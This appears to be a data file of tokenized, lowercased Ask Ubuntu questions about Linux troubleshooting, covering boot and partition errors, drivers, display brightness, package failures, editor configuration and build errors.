497302	unable to access windows partitions	dear all her is the message please help me to solve this problem i read about some similar problem error mounting /dev/sda3 at /media/momen/partition 2 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/momen/partition 2 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
497306	can not compile gcc or g++ libc_nonshared.a not recognized	i can not compile c/c++ files anymore since using a new account ( i think it was since then anyway ) and i 'm getting a strange error everytime i try to compile : ~ $ g++ hello.cpp /usr/lib/x86_64-linux-gnu/libc_nonshared.a : file not recognized : file format not recognized collect2 : ld returned 1 exit status ~ $ it happens with both gcc and g++ and i can not find any help on this anywhere . i am using ubuntu 12.04 thanks very much !
497307	can i add my keyboard layout to next ubuntu version ?	i want to know how to add arabic ( tunisia ) and french ( tunisia ) to next ubuntu version . because , there is file named 'ma ' with all moroccan keyboard layouts added to ubuntu automatically . and i want to make the same thing with tunisian keyboard layouts . thank you .
497308	error 'gave up waiting for root device ' for ubuntu 14.0.4 , after complete installation ?	i have windows 8 installed in my laptop . while i was installing ubuntu , it showed two partitions in my hard disk . i did n't knew much about the 'change ' option with that + and - sign given in the installation menu , so accidentally , i free one of disk space and grabbed some partition as and installed it . for the first time i tried the installation said 'complete ' then a pop up said somthing like 'gub boot file does not installed ' . so i quit the installation . then i tried to open up windows 8 and it said 'ty.sys file not found ' . i thought the error is due to improper installation of ubuntu , so i again tried to install it . this time i used the same location using format the space and installed again . for this time it succeded . when i started my laptop , i got a screen with option of opening *ubuntu advanced option for ubuntu memory test ( 86+ ) memory test ( 86+ , serial console 115200 ) free dos windos 8 ( loader ) whenever i am trying with ubuntu i am getting an error '' gave up waiting on root device ... . ... alert ! /dev/disk/by-uuid/779cc7a4-3677-487a-bd18-8620f838954f does not exist . dropping to a shell ! ' i am confused and i do n't know what to do . even windows is not running , it says a disk read error occured press ctrl+alt+del to restart help me !
497310	install older drivers on newer ubuntu ?	specifically , i have a dell laptop where not all of the hardware works oob with 14.04 . i would like to install ubuntu 14.04 , but install drivers dell created for 12.04 . being somewhat newbie to linux , is it possible to install drivers for an older version of ubuntu on a newer version ? if so , what is involved ? what are the risks ? thanks !
497312	my gateway 's bcm57765/57785 sd card reader is n't working	the device will not show up with `` sudo fdisk -l '' . this is not just a corrupt card , it 's been reoccurring for every card i try . this is the output from the dmesg [ 21.835685 ] mmcblk0 : unable to read partition table [ 21.836340 ] mmcblk0 : error -110 sending status command , retrying [ 21.837001 ] mmcblk0 : error -110 sending status command , retrying [ 21.837556 ] mmcblk0 : error -110 sending status command , aborting [ 21.838158 ] mmcblk0 : error -110 sending status command , retrying [ 21.838712 ] mmcblk0 : error -110 sending status command , retrying [ 21.839291 ] mmcblk0 : error -110 sending status command , aborting [ 21.839882 ] mmcblk0 : error -110 sending status command , retrying [ 21.840404 ] mmcblk0 : error -110 sending status command , retrying [ 21.840909 ] mmcblk0 : error -110 sending status command , aborting [ 21.841466 ] mmcblk0 : error -110 sending status command , retrying [ 21.841978 ] mmcblk0 : error -110 sending status command , retrying [ 21.842471 ] mmcblk0 : error -110 sending status command , aborting [ 21.843008 ] mmcblk0 : error -110 sending status command , retrying [ 21.843520 ] mmcblk0 : error -110 sending status command , retrying [ 21.844005 ] mmcblk0 : error -110 sending status command , aborting [ 21.844525 ] mmcblk0 : error -110 sending status command , retrying [ 21.844985 ] mmcblk0 : error -110 sending status command , retrying ... . it looks like there was a bug in the kernel reported here what can i do to fix the issue ? i tried $ sudo apt-get upgrade hoping it would pull in kernel fixes . it did not . i 'm not very experienced with updating the kernel .
497315	how to add lzma files	maybe someone here can help me . is there a way to add lzma files ? you have your uimage ; you extract the kernel and then decompress it and run binwalk on it to get this ( example ) : decimal hex description -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 184564 0x2d0f4 ascii cpio archive ( svr4 with no crc ) , file name : `` dev '' 184680 0x2d168 ascii cpio archive ( svr4 with no crc ) , file name : `` dev/console '' 184804 0x2d1e4 ascii cpio archive ( svr4 with no crc ) , file name : `` root '' 184920 0x2d258 ascii cpio archive ( svr4 with no crc ) , file name : `` trailer ! ! ! '' 5797868 0x5877ec linux kernel version `` 3.0.35-06433-g8e02e5d-dirty ( base @ there ) ( gcc version 4.6.x-goose @ there ) ( gcc version 4.6.x-google 20120106 ( prerelease ) ( gcc ) ogle 20120106 ( prerelease ) ( gcc ) ) # 6 smp preempt fri may 30 03 ) ) # 6 smp preempt fri may 30 03:07:36 mst 2014 '' 5811760 0x58ae30 lzma compressed data , properties : 0x02 , dictionary size : 16777216 bytes , uncompressed size : 50331648 bytes 5813168 0x58b3b0 gzip compressed data , from unix , null date : wed dec 31 17:00:00 1969 , max compression 5831784 0x58fc68 lzma compressed data , properties : 0x01 , dictionary size : 33554432 bytes , uncompressed size : 50331648 bytes 5888826 0x59db3a lzma compressed data , properties : 0x02 , dictionary size : 33554432 bytes , uncompressed size : 133128 bytes 5935896 0x5a9318 lzma compressed data , properties : 0x48 , dictionary size : 33554432 bytes , uncompressed size : 50331648 bytes now say i wanted to add an lzma file to the end of this ; decimal 5935896 , or say somewhere else ; between decimals 5813168 and 5831784 . how would i do that using the dd utility ? thanks ,
497318	client error response [ status code ] 413 [ reason phrase ] request entity too large [ url ]	i am trying to upload a file to openstack 's container . i can upload small files to the container successfully but not able to upload large files like 1 mb or larger than 1 mb . i am getting this error . client error response [ status code ] 413 [ reason phrase ] request entity too large [ url ] here is my code snippet < ? php require 'vendor/autoload.php ' ; use opencloud\openstack ; use opencloud\objectstore\resource\dataobject ; global $ client ; $ client = new openstack ( 'http : //192.168.171.131:35357/v2.0/ ' , array ( 'username ' = > 'admin ' , 'password ' = > 'devstack ' , 'tenantname ' = > 'admin' ) ) ; $ objectstoreservice = $ client- > objectstoreservice ( 'swift ' , 'regionone ' , 'publicurl ' ) ; $ container = $ objectstoreservice- > getcontainer ( 'mani @ ymail.com ' ) ; // upload large object to the container . $ options = array ( 'name ' = > 'test.doc ' , 'path ' = > 'uploads/test.doc' ) ; $ objecttransfer = $ container- > setupobjecttransfer ( $ options ) ; $ objecttransfer- > upload ( ) ; if i replace 'path ' = > 'uploads/test.doc ' with 'path ' = > getenv ( 'uploads/test.doc ' ) i get you must provide either a readable path or a body . i can easily upload the large files to my server using php . i can upload large files directly into container from openstack 's horizon dashboard
497319	wlan led constantly on ( t410 , xubuntu )	i find it rather annoying , that my wlan indicator led stopped working on xubuntu 14.04 . its on no matter what i do to the interface , i.e . disable it . it also does not blink on activity . the only way it does -anything- is killing the hardware switch , then it turns off . on ubuntu 14.04 and windows 7 it reacts fine with being on when wifi is enablend , being off when its disabled and blinking when there is a transfer . how can i get this to work ? its an intel centrino 6200agn . greetings ! my /etc/modprobe.d/iwlwifi.conf # /etc/modprobe.d/iwlwifi.conf # iwlwifi will dyamically load either iwldvm or iwlmvm depending on the # microcode file installed on the system . when removing iwlwifi , first # remove the iwl ? vm module and then iwlwifi . remove iwlwifi \ ( /sbin/lsmod | grep -o -e ^iwlmvm -e ^iwldvm -e ^iwlwifi | xargs /sbin/rmmod ) \ & & /sbin/modprobe -r mac80211 options iwlwifi led_mode=2
497320	how do i get both ubuntu server after i installed ubuntu desktop ?	i want to partition my hard drive so i can switch back and forth , but i ca n't find anywhere where it tells me how . i have a 1tb hard drive so i definitely have space , and i want to experiment with the server . does anyone have any instructions on how to walk me through partitioning and installing correctly ? thanks in advance
497322	ubuntu 14.04 brightness shortcut not working	i 'm using asus a450l : here are some info : cat /proc/cmdline boot_image=/boot/vmlinuz-3.13.0-30-generic.efi.signed root=uuid=d1cccc17-9e70-4682-bb40-c3df0db22e36 ro quiet splash vt.handoff=7 lspci -k | grep -a3 vga 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) subsystem : asustek computer inc. device 13fd kernel driver in use : i915 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) for i in /sys/class/backlight/* ; do echo $ i ; cat $ i/brightness ; cat $ i/actual_brightness ; cat $ i/max_brightness ; done /sys/class/backlight/acpi_video0 100 100 100 /sys/class/backlight/acpi_video1 18 18 100 /sys/class/backlight/intel_backlight 103 103 937 i have tried these solutions and none works : create a file in /usr/share/x11/xorg.conf.d/20-intel.conf section `` device '' identifier `` card0 '' driver `` intel '' option `` backlight '' `` intel_backlight '' busid `` pci:0:2:0 '' endsection grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' in /etc/default/grub thanks .
497324	how to add an directory to `` places '' list	i have directory where it is placed in a deep path . so i want to put that in here : how i can do that ?
497327	multifeeder use triggers io error in x/sane when using a epson 4530 all in one	i have nearly converted my office space to an ubuntu 12.04 system , using libre office , chromium , and mostly all is well . the one problem is my epson 4530 all in one scanner/printer . the printer works great . scanner , not so good . i have installed all the proper drivers from the epson site . as stated above , no printer issues . when i single page/flat platen scan one page , no problems with either xsane or simple scan . however , when i use the automatic multi-feeder : the first page feeds into the `` ready '' position ; then the printer 's lights all blink on , then intermittently continue to do so . i get an i/o error from both xsane or simple scan . this also happens with skanlite . i can not find a fix . it 's frustrating , because the computer and 12.04 clearly recognize the 4 in 1 epson . it is the actual multi-feeder communication that is crashing . hints ? i do n't want to go back to windows 7 and 8 , but this is kinda a deal breaker .
497328	ubuntu 14.04 no launcher or dash on login	i have a hp pavilion p7-1010 desktop computer that is dual-booted with windows 7 home premium and ubuntu 14.04 lts . on ubuntu 14.04 , the main account will not show the launcher or the dash upon logging in , and will only show a desktop background and the cursor . i have managed to open the terminal with control+alt+f1 . this computer does not have an nvidia graphics card . this problem will only occur on one user , which is the main user . all the other accounts work perfectly fine . i have struggled with this problem for about a month and it would be nice if this problem could be fixed .
497332	`` unable to find a medium containing a live file system '' error	i 'm trying to install ubuntu on my laptop but i 'm getting the error message : ( initramfs ) unable to find a medium containing a live file system i want to install it alongside windows 7 on my dell inspiron 1525 . i 'm trying to boot from an iso which i put in d : and made bootable using easybcd . i checked the md5sum using winmd5sum . i 'm new to linux so i do n't really know what to do ... any help would be appreciated .
497334	global proxy settings switcher for tray	is there any app to do same work as proxy switch sharp do for chrome & chromium , but only globally gor all apps using gsettings ? so you can create some profiles and switch between them by clicking tray icon on something like that ? of course i can create some shortcuts for gsettings command to switch proxy , but it 'll be great to have some indicator on what proxy profile i 'm now . thanks .
497335	`` error loading operating system '' ubuntu 14.04 / windows 8.1	i know there are several other questions like this - but at least on the first 2 pages of google i could n't find a solution . i have windows 8.1 originally , on a 1tb hdd . i installed ubuntu 14.04 lts from a usb as instructed in the ubuntu guide . after install , i removed usb and restarted -- and i got `` error loading operating system '' message . i am not sure how to diagnose further or solve , all the other questions are too vague . edit : when i installed , the installation process told me that it `` did n't detect any other operating systems '' , even though windows 8.1 is installed . so i felt that i needed to manually manage partitions . i resized my /dev/sda1 ( ntfs ) 1tb to 800gb , then created ext4 on a new /dev/sda5 and 8gb swap on /dev/sda6 i installed ubuntu on the /dev/sda5 thanks , jamie .
497336	how to connect to my network	i am a complete newbie to linux/ubuntu . i experimented with zorin 6.2 , which immediately found my wifi network and connected to it , but i thought i would be better off to get the latest ubuntu lts distro ( 14.04 ) . unfortunately , ubuntu has not picked up my network , and the manual setup is very complex . could someone please direct me to step-by-step instructions for getting connected to my network ? fyi , i chose ubuntu because it was said to be friendly for first-time linux users , switching over from windows . so far , i am quite disappointed . i 'm an advanced windows user , but decided to switch because of ms ' support policies and attempts to dominate the market . i 'd really like to make ubuntu work for me , but so far , it 's been a total zero . i did an on-line search and found some other poor soul like myself , who was basically told that he was a dumb ass for not being able to figure out his problem for himself . i hope this is not the mindset of the rest of the linux community .
497337	i ca n't write in ubuntu 14.04	i have a problem with my computer . my pc does n't write . the keyboard is working for sure ( in the windows partion works perfectly , also when i switch on my computer i can choose between ubuntu or windows by using the keyboard ) . even it 's posible to use the ctrl key for multiple selection in ubuntu . but when i try to write , it just does n't respond , i tried to with the keyboard onboard , and it does n't work neither . also , sometimes when i try to turn it on it does n't launch and freeze making a beep . the begining of the problem was a couple days ago when i opened my laptop for cleaning , as i use to do every couple of months . a part of cleaning is remove the keyboard . after cleaning the keyboard works , but not perfectly , so i thought maybe it was n't plugged correctly . after removing and plugging , the pc begins to fail . 多somebody has any clue for how to solve the case ?
497338	sub-process /usr/bin/dpkg returned an error code ( 1 ) after upgrade to 14.04	after upgrading 12.04 to 14.04 on my server , i get a error when trying to update my packages . sudo apt-get upgrade no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up libapache2-mod-php5 ( 5.5.9+dfsg-1ubuntu4.3 ) ... php5_invoke pdo : already enabled for apache2 sapi php5_invoke readline : already enabled for apache2 sapi php5_invoke gmp : already enabled for apache2 sapi php5_invoke sqlite3 : already enabled for apache2 sapi php5_invoke json : already enabled for apache2 sapi php5_invoke pdo_sqlite : already enabled for apache2 sapi php5_invoke gd : already enabled for apache2 sapi php5_invoke opcache : already enabled for apache2 sapi dpkg : error processing package libapache2-mod-php5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried several solutions i found without result .
497339	ca n't install ubuntu 14.04 because of wrong screen resolution	i 'm trying to install ubuntu 14.04 lts from a usb , and when i boot into it to get started , i ca n't use my mouse and i can only see part of the window . i ca n't drag the window and i ca n't access terminal . i can use the keyboard but i need the mouse because i need to manually set the partitions . when i tried to boot with nomodeset , i can hear the sound of ubuntu starting but my monitor goes to sleep . i 've looked at all of the other threads i can find , and all i 've found out is that it 's an issue with my graphics card , an amd 7770 . i 'm not quite sure what to do at this point . any help would be lovely .
497340	ca n't change color of gui after upgrade to lubuntu 14.04 i386	i push apply but only changed color of customize look and feel : i close and start again customize look and feel and see again white theme ( i need dark for my eyes ) .
497342	acer c7 will not boot into chrubuntu - kern-c set as highest priority	i am trying to boot into chrubuntu with my acer c7 . when i run the command sudo cgpt show /dev/sda it displays kern-c as being the highest priority ( 5 ) , so i 'm not sure what 's wrong with my ubuntu partition . it seems as though the ubuntu install is failing and it 's defaulting to the the next highest priority kern . do i need to reinstall chrubuntu ? i 'm using version 12.04 , and have been successfully transitioning between chromeos and ubuntu for several months using the sudo cgpt add -i 6 -p 5 -t 1 -s 0 /dev/sda command with no issues . i booted into chromeos yesterday and now i can not get it to boot into ubuntu using that command anymore as i have in the past . please let me know if you have any suggestions or troubleshooting ideas .
497354	backups - operation unsupported	i am trying to back-up my /home/ folder to my ftp server using the backups program that is pre-installed on my ubuntu 14.04 system , however after 5 minutes of clicking 'backup now ' , i get an error message stating 'operation unsupported ' . does anyone know a fix to this ?
497355	how to transform vim configuration into emacs one ?	i need to setup emacs editor by preparing the ~/.emacs configuration file . i have been using vim for years and now i want to switch to emacs for various reasons that are out of scope of this post . to do so , i need to reproduce in emacs all the functionality of vim that i worked out over years of using it . in other words : i want to transform my ~/.vimrc configuration file into the equivalent ~/.emacs configuration file . i include my ~/.vimrc with all settings commented in this post , it can also be downloaded from my github repository . i know that my ~/.vimrc contains quite a lot of settings , but i have already figured out how transform some of them , and i am also aware that some of the settings do n't really need to be transformed . unfortunately , most of them are still beyond my current knowledge of emacs configuration . here is my ~/.vimrc : '' configuration file for vi improved , save as ~/.vimrc to use . set nocompatible `` vim mode instead of pure vi set encoding=utf-8 `` encoding used for displaying file set fileencoding=utf-8 `` encoding used when saving file set nobackup `` do not keep the backup~ file set confirm `` confirm : q in case of unsaved changes set ruler `` show the cursor position all the time set textwidth=80 `` wrap lines automatically at 80th column set tabstop=8 `` set tabulator length to 8 columns set expandtab `` fill tabs with spaces set softtabstop=8 `` backspacing over 8 spaces like over tabs set shiftwidth=8 `` set indentation depth to 8 columns set backspace=indent , eol , start `` backspacing over everything in insert mode set nojoinspaces `` no extra space after ' . ' when joining lines set incsearch `` do incremental search set ignorecase `` do case insensitive search ... set smartcase `` ... unless capital letters are used set hlsearch `` highlight search results set showmatch `` highlight matching braces filetype on `` enable file type detection filetype plugin on `` load the plugins for specific file types filetype indent on `` automatically indent code ... set cinoptions=:0g0 `` ... but do n't indent case labels and access modifiers syntax enable `` syntax highlighting set background=dark `` dark background for console colorscheme solarized `` set color scheme , must be installed before use '' characters for displaying non-printable characters set listchars=eol : $ , tab : > - , trail : . , nbsp : _ , extends : + , precedes : + '' tuning for gvim only if has ( 'gui_running ' ) set number `` show line numbers set columns=84 lines=48 `` gui window geometry set guifont=monospace\ 12 `` font for gui window set background=light `` light background for gui endif '' automatic commands if has ( 'autocmd ' ) `` file type specific automatic commands `` do n't replace tabs with spaces when editing makefiles autocmd filetype makefile setlocal noexpandtab `` press f5 to call `indent` for c and c++ source code files autocmd filetype c , cpp noremap < f5 > : % ! indent -kr -brf -nut < cr > autocmd filetype c , cpp inoremap < f5 > < esc > : % ! indent -kr -brf -nut < cr > `` tuning textwidth for java code autocmd filetype java setlocal textwidth=132 if has ( 'gui_running ' ) autocmd filetype java setlocal columns=136 endif `` disable automatic code indentation when editing tex and xml files autocmd filetype tex , xml setlocal indentexpr= `` clean-up commands that run automatically on write ; use with caution `` delete empty or whitespaces-only lines at the end of file autocmd bufwritepre * : % s/\ ( \s*\n\ ) \+\ % $ //ge `` replace groups of empty or whitespaces-only lines with one empty line autocmd bufwritepre * : % s/\ ( \s*\n\ ) \ { 3 , } /\r\r/ge `` delete any trailing whitespaces autocmd bufwritepre * : % s/\s\+ $ //ge endif '' general key mappings '' center view on the search result noremap n nzz noremap n nzz '' press f4 to fix indentation in whole file ; overwrites marker 'q ' position noremap < f4 > mqggvg=`qzz inoremap < f4 > < esc > mqggvg=`qzza '' press f8 to turn the search results highlight off noremap < f8 > : nohl < cr > inoremap < f8 > < esc > : nohl < cr > a '' press f12 to toggle showing the non-printable charactes noremap < f12 > : set list ! < cr > inoremap < f12 > < esc > : set list ! < cr > a
497356	install phppgadmin without apache	i 'm trying to setup a nginx+postgresql testing server , but when i try to install phppgadmin it tries to install apache2 , i do n't want to install apache2 , is there a way to install it without apache ?
497357	add more functions for my logitech touchpad	i just bought a logitech track-pad for my computer and i was curious if apart from a few basic actions and gestures i could add more in a simple way ? like maybe a close application gesture ? any help would be appreciated : )
497358	how to install mono on ubuntu 64-bit v14.04 ?	so i 've been having a play using ms azure through ubuntu , but in order to manage my azure server , it 's asked me to install silverlight which has then directed me to install mono . i 've downloaded mono but the archive manager wo n't open it . reading around , i 'm guessing this is because i 'm running a 64bit system , and i gather that to get mono running in 64-bit , it needs installing through code . i 'm super new to both ubuntu and unix ... please can anyone help advise what code to paste into a terminal session in order to get mono installed so that i can get back to azure : - ) greatly appreciate any help . cheers jon
497359	changing the background of terminal in zsh when connected to server	i use terminator as a terminal , zsh shell and oh my zsh , on both my laptop and my server , for what it 's worth , i created an alias named vps to connect to my vps using ssh . currently terminator background color is black , could it be made lets say white when connected to vps , although it 's pretty easy to tell when i 'm connected to the vps and when i 'm not , still it would be nice if such thing is possible .
497360	a few beginner questions	greetings to all here.. i 'm a complete linux virgin , so apologies if anything i 'm asking is blatantly obvious.. ( i have done a brief search for the issues i 'm having ) please go easy on the terminology.. i 've years of windows to cleanse myself of . how do i go about deleting files/folders permanently.. i 've quite a few gb worth of old windows files i 'd like to remove , but short of moving them to the rubbish bin & then emptying it i ca n't see any option to permanently delete i 've tried rm -r/-f but am told there is no such file or folder . i have a nvidia gtx 670 are linux drivers available & easy enough to install ? i 've also been told that the more interesting/useful software is to be found on alternative repo 's can someone educate me ? thanks for listening .
497363	clean up openproj	for the usual reasons i tried to install open project , a rpm package using alien as follows , sudo alien openproj-1.4-2.noarch.rpm dpkg -i openproj_1.4-3_all.deb which did n't work because of the need for a different flavour of java to the one that is installed on my ubuntu 12.04 . using a similar procedure i installed projectlibre . everything worked fine . my question ... how do i remove and clean up openproj ?
497366	computer boots , but mouse freezes and keyboard unresponsive	i have an hp desktop about 4 years old , 3 gb ram & 500 gb hd . i had windows 7 on it but messed it up when i tried to dual boot windows 7 and elementary os linux . i lost windows 7 and linux worked ok . i wanted to remove elementary os linux and replace with ubuntu 14.04 . i downloaded the iso file and transferred to a dvd . checked the dvd and it was on there . i booted from the disk and selected erase hard drive and install ubuntu by itself . it installed everything and i restarted . everything booted fine but when i moved the mouse everything froze up including keyboard . rebooted and same thing . i made a live usb flashdrive and reinstalled ubuntu and same thing !
497368	ca n't get nautilus to go sudo with gksu	i was recently reading some linux articles and stumbled on a faster way to do sudo tasks the gui way by installing a package called gksu-nautilus which allows me perform tasks with root permissions without having to go through terminal . i installed the package with synaptic and restarted nautilus with the command below : nautilus -q i then ran the lines gksu nautilus in terminal and got a prompt to enter my password , i entered it and immediately the errors below were displayed in terminal : ( nautilus:4062 ) : glib-gobject-warning ** : invalid cast from 'gtkmessagedialog ' to 'nautiluswindow' ** error : nautilus-window.c:2116 : nautilus_window_get_slots : assertion failed : ( nautilus_is_window ( window ) ) i decided to try sudo nautilus , and got the same error . i 'll really appreciate a solution to this problem .
497373	getting ubuntu to remember settings for twitch tv	i only really noticed it on twitch but everything i go to watch a stream i have to force it to go to the highest quality . usually if you choose a setting it will always be there but i can go to the same stream and it does n't remember it .
497375	i have a problem with hdmi sound on both ubuntu 14 and windows 7 , is this hardware ?	i have a problem with hdmi sound on both ubuntu 14 and windows 7 , is this hardware ? the problem only occurs when running games ( something sound intensive ) i get ugly noise through the speakers . this also occurs in windows and did n't until a couple of months ago . switching to optical stereo has resolved the issue but i have lost 5.1 sound . i think it may be the hardware itself since this is a new problem and is common to 2 operating systems . i also think this because hdmi sound is relatively simple to do . i have a geforce 670 gtx and is fairly new , still in warranty , does this sound like a hardware problem ?
497382	terminal not returning anything when i try to install a .bin file ?	i 'm an extreme linux newbie . i dualboot 12.04 ubuntu on my arm samsung chromebook , and i like it a lot so far . i 'm trying to install a .bin file through the terminal , and despite following the guides i 've read thus far , it 's like the terminal does n't even hear me ? ? ? ( precise ) akamnis @ localhost : ~ $ cd downloads ( precise ) akamnis @ localhost : ~/downloads $ chmod a+x yohoho-0 -- en-install.bin ( precise ) akamnis @ localhost : ~/downloads $ sudo ./yohoho-0 -- en-install.bin [ sudo ] password for akamnis : ( precise ) akamnis @ localhost : ~/downloads $ i 've done this a million times , and the terminal always kicks me back to the file path after i enter password . edit : here is the pastebin for the code . everything afterwards is garbled -- gedit says that the characters are invalid . should be worth noting that it 's the third time i 've downloaded the file , and the other two downloads are apparently file size = 0 bytes ? the file i got this code from , though , lists it as 1.2 mbs .
497383	dig +trace returns my dns ip	when i 'm trying to execute dig +trace command , output is the following : $ dig +trace google.com ; < < > > dig 9.9.5-3-ubuntu < < > > +trace google.com ; ; global options : +cmd ; ; received 12 bytes from 127.0.1.1 # 53 ( 127.0.1.1 ) in 10 ms i assume there are some issues with my dns setup , but i do not know where to look . any suggestions ?
497387	unable to share ntfs drive	i 'm hoping someone can help me with this problem - i have previously asked it elsewhere but been given conflicting responses . i have a primary 120gb ssd with ubuntu 14.04 and a win 7 vm installed . i want the ubuntu host and the vm to be able to read and write to a shared folder on a secondary internal hdd . i also want this shared folder on the secondary hdd to be available to my laptop via the network , also running ubuntu 14.04 . it was suggested that i should make the secondary hdd ntfs so that the win 7 vm could make use of it . i 've done this and it all works fine but i 've been unable to make the shared folder available to my laptop . so my question is can it be done and if not is there an alternative way to achieve what i 'm trying to do ? thanks in advance for any help - please keep it simple as i 'm still relatively new to ubuntu .
497392	binding synapse shortcut to key-release instead of key-press	background so i 've already referred a question that demonstrates how to bind the synapse launcher to the `` super ( win ) key '' . ( can i change synapse shortcut to super/windows key alone ? ) the problem is that combinations involving the super key now all launch synapse . i believe this is happening because synapse is being activated on the button-press event rather than on the button-release event as would happen with , say , unity or while using it on windows . question is there any way in ubuntu to bind a shortcut to the button-release event ? that way i can use the super button in other combinations , like `` super + d '' for show desktop or something . environment i 'm using the gnome ( compiz ) flashback session environment on ubuntu 14.04 lts .
497395	14.04 wireless throughput issues	using iperf to test throughput using intel centrino advanced-n 6205 , i 'm getting 20mbps up and 50mbps down . ap is attached to 100mbps switch so i expect 80-100mbps as confirmed when doing the same test from windows . i 've disabled 802.11n but still get the same results , changed the swcrypto option , updated kernel to 3.14 i noticed that upload traffic generates `` invalid misc '' as reported by iwconfig . i 've also stopped the network manager service and used wpa_supplicant to connect and still see the same problem . wlan0 ieee 802.11abgn essid : '' ***** '' mode : managed frequency:5.785 ghz access point : 88 : dc:96:12:09 : b3 bit rate=81 mb/s tx-power=15 dbm retry short limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=46/70 signal level=-64 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:233 missed beacon:0
497397	sftp error in nautilus on 14.04	when attempting to use sftp in nautlius , either via the location bar or the 'connect to server ' menu , i get the following message : do n't have permission to access the requested location . when i start nautilus with root permissions , i can not click the connect button - this message is displayed below the address box : this file sever type is not recognised i have sshfs installed : root @ liam-x401a : /home/liam # apt-get install sshfs reading package lists ... done building dependency tree reading state information ... done sshfs is already the newest version . 0 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . root @ liam-x401a : /home/liam # what can i do to make sftp work through nautlius ?
497400	`` could not find kde4workspace ( missing : kde4workspace_config ) ( required is at least version `` 4.9.80 '' ) ''	i have been trying to install oxygen-transparent on my kubuntu 14.04 installation for a while now , and every time it fails with the following error : aspire-7560 : ~/oxygen-transparent/oxygen-transparent $ sudo make make : *** no targets specified and no makefile found . stop . sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent/oxygen-transparent $ sudo apt-get install oxygen-transparent reading package lists ... done building dependency tree reading state information ... done e : unable to locate package oxygen-transparent sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent $ chmod +x oxygen-setup.pl sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent $ ./oxygen-setup.pl -- - oxygen transparent easy setup script -- - checking out source code git clone git : //anongit.kde.org/oxygen-transparent cloning into 'oxygen-transparent ' ... remote : counting objects : 2844 , done . remote : compressing objects : 100 % ( 793/793 ) , done . remote : total 2844 ( delta 2367 ) , reused 2489 ( delta 2049 ) receiving objects : 100 % ( 2844/2844 ) , 2.79 mib | 545.00 kib/s , done . resolving deltas : 100 % ( 2367/2367 ) , done . checking connectivity ... done . mv oxygen-transparent src cd /home/sawyer/oxygen-transparent -- - running cmake mkdir -p /home/sawyer/oxygen-transparent/build cd /home/sawyer/oxygen-transparent/build cmake -dcmake_install_prefix=`kde4-config -- prefix` -dcmake_build_type=release /home/sawyer/oxygen-transparent/src -- the c compiler identification is gnu 4.8.2 -- the cxx compiler identification is gnu 4.8.2 -- check for working c compiler : /usr/bin/cc -- check for working c compiler : /usr/bin/cc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- looking for q_ws_x11 -- looking for q_ws_x11 - found -- looking for q_ws_win -- looking for q_ws_win - not found -- looking for q_ws_qws -- looking for q_ws_qws - not found -- looking for q_ws_mac -- looking for q_ws_mac - not found -- found qt-version 4.8.6 ( using /usr/bin/qmake ) -- looking for xopendisplay in /usr/lib/x86_64-linux-gnu/libx11.so ; /usr/lib/x86_64-linux-gnu/libxext.so ; /usr/lib/x86_64-linux-gnu/libxau.so ; /usr/lib/x86_64-linux-gnu/libxdmcp.so -- looking for xopendisplay in /usr/lib/x86_64-linux-gnu/libx11.so ; /usr/lib/x86_64-linux-gnu/libxext.so ; /usr/lib/x86_64-linux-gnu/libxau.so ; /usr/lib/x86_64-linux-gnu/libxdmcp.so - found -- looking for gethostbyname -- looking for gethostbyname - found -- looking for connect -- looking for connect - found -- looking for remove -- looking for remove - found -- looking for shmat -- looking for shmat - found -- looking for iceconnectionnumber in ice -- looking for iceconnectionnumber in ice - found -- found x11 : /usr/lib/x86_64-linux-gnu/libx11.so -- looking for include file pthread.h -- looking for include file pthread.h - found -- looking for pthread_create -- looking for pthread_create - not found -- looking for pthread_create in pthreads -- looking for pthread_create in pthreads - not found -- looking for pthread_create in pthread -- looking for pthread_create in pthread - found -- found threads : true -- looking for _posix_timers -- looking for _posix_timers - found -- found automoc4 : /usr/bin/automoc4 -- found perl : /usr/bin/perl ( found version `` 5.18.2 '' ) -- found phonon : /usr/include ( required is at least version `` 4.3.80 '' ) -- performing test _offt_is_64bit -- performing test _offt_is_64bit - success -- performing test have_fpie_support -- performing test have_fpie_support - success -- performing test __kde_have_w_overloaded_virtual -- performing test __kde_have_w_overloaded_virtual - success -- performing test __kde_have_gcc_visibility -- performing test __kde_have_gcc_visibility - success -- found kde 4.12 include dir : /usr/include -- found kde 4.12 library dir : /usr/lib -- found the kde4 kconfig_compiler preprocessor : /usr/bin/kconfig_compiler -- found automoc4 : /usr/bin/automoc4 cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:108 ( message ) : could not find kde4workspace ( missing : kde4workspace_config ) ( required is at least version `` 4.9.80 '' ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:315 ( _fphsa_failure_message ) 